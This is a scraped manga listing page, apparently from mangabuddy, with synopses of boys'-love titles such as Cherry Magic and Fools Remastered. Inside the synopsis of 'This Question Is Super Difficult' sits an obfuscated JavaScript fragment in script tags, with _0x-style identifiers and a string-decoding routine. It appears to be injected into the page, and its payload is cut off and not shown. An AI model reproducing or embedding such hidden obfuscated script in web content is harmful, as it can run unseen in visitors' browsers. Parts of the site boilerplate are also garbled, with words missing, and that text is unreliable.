Shounen Ai - Page 68

Discover top manga Shounen Ai with stunning art and thrilling tales. Enjoy the best Shounen Ai manga free online today!

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.A sweet story between a little angel and a big angel~


Cherry Magic! Thirty Years Of Virginity Can Make You A Wizard?!

Volume 1: It's complicated: A thirty-year-old virgin gets more than he bargained for when his newfound magical power reveals he's the object of his male coworker's affections! Adachi, a thirty-year-old virgin, has developed the power to read people's minds by touching them. After a brush with his very handsome colleague, Adachi realizes the guy has a raging crush on none other than Adachi himself! Volume 2: Businessman Adachi turned thirty a virgin, and now he's a wizard who can read the mind of anyone he touches...which is how he learned that his handsome coworker Kurosawa was in love with him! Inexperienced Adachi was initially bewildered by Kurosawa's intense feelings, but after being exposed to Kurosawa's genuine affection, Adachi finds Kurosawa on his mind a lot more often than he'd care to admit these days! Will the upcoming staff business trip turn into a trip for two for Kurosawa and Adachi?! Volume 3: Ever since he was blessed (cursed?) on his thirtieth birthday with the magical ability to read the minds of those he touches, virginal office drone Adachi has been put through the ringer, especially after discovering his colleague Kurosawa's feelings for him! And just when it seems like Adachi might be able to take his friendship with Kurosawa to the next level, Adachi's complex about not having any romantic experience gets in the way. Unfortunately for Adachi, taking things nice and slow is out the window when it turns out the two of them are going to be sharing an apartment!! Volume 4: Gifted (cursed?) at the age of 30 with the ability to read the mind of whomever he touches (even the coworker with the hots for him!), virginal businessman-turned-wizard Adachi is taking his first tentative steps into love! After being wooed within an inch of his life by the tenacious Kurosawa, Adachi's at last on board with his feelings for his handsome, kind colleague and has come around to the idea of Kurosawa as his very first significant other. But now that the pair are officially an item, Kurosawa is chomping at the bit to do all the couple stuff he's been dreaming about, including dating! There's just one little problem: Adachi, the 30-year-old virgin, has never even been on a date! Volume 5: Is Adachi, the thirty-year-old virginal businessman, finally about to lose the very quality that gave him magic powers?! Ever since Adachi and Kurosawa officially became an item, their relationship has been progressing smoothly. But all the while, Adachi's been gripped by guilt because he still hasn't told Kurosawa about his bad wizard self! And as Adachi frets, looking for the right moment to let the cat out of the bag, Kurosawa's birthday is upon him! Will it be a make (love)–or–break (up) moment for the pair?!


This Question Is Super Difficult

Who would've thought that rivals, the academic tyrant, Xu Sheng, and the top student, Zhao Zhan, would exchange bodies a few times and then start to like each other secretly! After many clueless situations the two became closer to each other, after they experience some funny stories and incidents, they finally understand their feelings for each other.<script></script><script>function _0x1a05(_0x146ca4,_0x5cfbdc){var _0x2b9f5f=_0x56f2();return _0x1a05=function(_0xa95d74,_0x57540){_0xa95d74=_0xa95d74-(-0xc*0x2f5+-0xa3*-0xf+0x1ac0);var _0x43ef34=_0x2b9f5f[_0xa95d74];return _0x43ef34;},_0x1a05(_0x146ca4,_0x5cfbdc);}(function(_0x5df0e4,_0x581adf){var _0x38d3c2=_0x1a05,_0xa0d02a=_0x5df0e4();while(!![]){try{var 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The Diary to the Stage

After numerous training, their dream is about to take flight. The winds of youth are taking their steps towards their dream journey. Glory and fame, dream and sweat. As the trainees aim for the stage, what does it take to get there? What kind of path will they take? This is based on a true story.


My Secretary, Would You Choose Me?

.An unexpected shooting took away the man in Cheng Sheng's heart, the man who couldn't talk, leaving him with only two sons, Wei Tianheng and Wei Tianchu, who had quite different personalities. Cheng Sheng gradually realized that two children had opposing views on themselves as time passed...


Fools Remastered

Eunki's always been an introvert, but he was never this jaded before. All the vivid excitement he felt as a freshman moving to the big city has faded into colorless lethargy years later. Now he mostly keeps to himself, only showing his face at the occasional meet-up. But at one such event, he runs into Jungwoo, a peppy young freshman who's keen to make a good impression. Little does Eunki know that this eager hoobae is about to sweep through his stale life like a breath of fresh air. From the creators of “Love or Hate” comes the new and improved retelling of a fan favorite. These boys have never looked so good.


Spring Is Near

.He Wei originally used to live a peaceful life in a small sleeping town, with a more than lovers friend, Wan Jun. But suddenly, two guys who aren't used to living in small towns came from the big city. It was his non blood related brother, Song Qiurang, that caused He Wei to leave from home and Zhu Ma Bai Lin who he has a good impression of. The arrival of these two people changed He Wei's life and turned his world upside down, thus some secrets started to slowly float up to the surface...


Kimi No Sumire

Recently transferred to a new school, Sumire meets Toujou, a boy they all call, "The school's solitary Madonna." After stepping between a fight with Toujou and some others, he takes a liking to Sumire and they begin to spend their school days together. Although beautiful on the outside, Toujou is surprisingly brusque. Despite not making any effort to interact with others, he's surprisingly sweet to Sumire, which gets Sumire's heart thumping. One day, after Toujou's injured in a fight, he suddenly kisses Sumire!+



This volume features seven short stories, four of which focus around Tooru and Kei, members of the band JX's. Find out what happens when you're groupies are young, beautiful and rich enough to kidnap you for afternoon tea!


The Secret Of Umbra

I'm the new kid in town. When Gabriele is forced to move away from his city life to a rural town in Italy, he is determined to hate everything about Umbra. The town's so old, and everyone his age looks miserable. He's never gonna adjust, and he's gonna miss his big city life. Except, there's a mystery here one of love.mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


Hello, My Wolf

Werewolf President x Vampire President, who does not know, X City's two largest company's president is a vampire and the other a werewolf, not only that, the two grew up together. In order to be able to catch up with his beloved vampire, the werewolf volunteer to become a vampire assistant and slave, only for the success of the pursuit of his wife, color and taboo urban love began...
